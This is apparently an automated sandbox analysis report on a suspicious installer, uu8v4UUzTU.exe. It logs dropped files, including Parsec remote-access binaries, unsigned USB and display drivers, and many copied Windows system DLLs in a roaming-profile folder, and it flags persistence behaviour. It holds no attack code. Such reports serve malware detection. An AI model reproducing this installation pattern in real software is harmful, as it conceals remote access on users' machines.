Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: uu8v4UUzTU.exeStatic file information: File size 50493432 > 1048576
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 00000049.00000003.2474352730.000002868CACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000038.00000002.2444060898.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000038.00000003.2443146793.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000002.00000002.2291864507.000000000018C000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000036.00000003.2374772071.000002849F521000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: is-IH0UT.tmp.2.drStatic PE information: 0xC9B97BBC [Wed Mar 31 00:30:52 2077 UTC]
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC6550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs,6_2_00FC6550
Source: uu8v4UUzTU.exeStatic PE information: section name: .didata
Source: uu8v4UUzTU.tmp.0.drStatic PE information: section name: .didata
Source: is-0HD4S.tmp.2.drStatic PE information: section name: .didat
Source: is-JR54E.tmp.2.drStatic PE information: section name: .didat
Source: is-IQ3DU.tmp.2.drStatic PE information: section name: .didat
Source: is-JBM9N.tmp.2.drStatic PE information: section name: .didata
Source: is-OGENO.tmp.2.drStatic PE information: section name: .didat
Source: is-4URGO.tmp.2.drStatic PE information: section name: .didat
Source: is-RT5NS.tmp.2.drStatic PE information: section name: .didat
Source: is-514OT.tmp.2.drStatic PE information: section name: .didat
Source: is-BT11A.tmp.2.drStatic PE information: section name: .didat
Source: is-6QS3I.tmp.2.drStatic PE information: section name: .didat
Source: is-MAETF.tmp.2.drStatic PE information: section name: .didat
Source: is-CFLCO.tmp.2.drStatic PE information: section name: .didat
Source: is-2DG57.tmp.2.drStatic PE information: section name: .didat
Source: is-MRTFO.tmp.2.drStatic PE information: section name: .didat
Source: is-9PV08.tmp.2.drStatic PE information: section name: .didat
Source: is-G3B26.tmp.2.drStatic PE information: section name: .didat
Source: is-9HF18.tmp.2.drStatic PE information: section name: .didat
Source: is-NSRV7.tmp.2.drStatic PE information: section name: .didat
Source: is-CEP95.tmp.2.drStatic PE information: section name: .didat
Source: is-LQSSJ.tmp.2.drStatic PE information: section name: .didata
Source: is-I559Q.tmp.2.drStatic PE information: section name: .didat
Source: teams.exe.13.drStatic PE information: section name: _RDATA
Source: parsecd.exe.13.drStatic PE information: section name: _RDATA
Source: pservice.exe.13.drStatic PE information: section name: _RDATA
Source: parsecd-150-93b.dll.13.drStatic PE information: section name: .detourc
Source: parsecd-150-93b.dll.13.drStatic PE information: section name: .detourd
Source: parsecd-150-93b.dll.13.drStatic PE information: section name: _RDATA
Source: nefconc.exe.45.drStatic PE information: section name: .detourc
Source: nefconc.exe.45.drStatic PE information: section name: .detourd
Source: nefconc.exe.45.drStatic PE information: section name: _RDATA
Source: nefconw.exe.45.drStatic PE information: section name: .detourc
Source: nefconw.exe.45.drStatic PE information: section name: .detourd
Source: nefconw.exe.45.drStatic PE information: section name: _RDATA
Source: parsecvusba.sys.45.drStatic PE information: section name: PAGED
Source: SET614C.tmp.52.drStatic PE information: section name: PAGED
Source: SET638E.tmp.54.drStatic PE information: section name: PAGED
Source: nefconw.exe.65.drStatic PE information: section name: .detourc
Source: nefconw.exe.65.drStatic PE information: section name: .detourd
Source: nefconw.exe.65.drStatic PE information: section name: _RDATA
Source: mm.dll.65.drStatic PE information: section name: _RDATA
Source: SET8ABC.tmp.73.drStatic PE information: section name: _RDATA
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F9F496 push rcx; ret 6_2_00F9F497
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04569C push rax; retf 0000h39_2_00007FF7CD04569D
Source: is-MRTFO.tmp.2.drStatic PE information: section name: .text entropy: 7.183765567357945

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
Sample is not signed and drops a device driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-UEG3C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-MAETF.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\pservice.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-RT5NS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-2UJJU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-MRTFO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-O65TT.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-PJ6TS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpFile created: C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeFile created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exeJump to dropped file
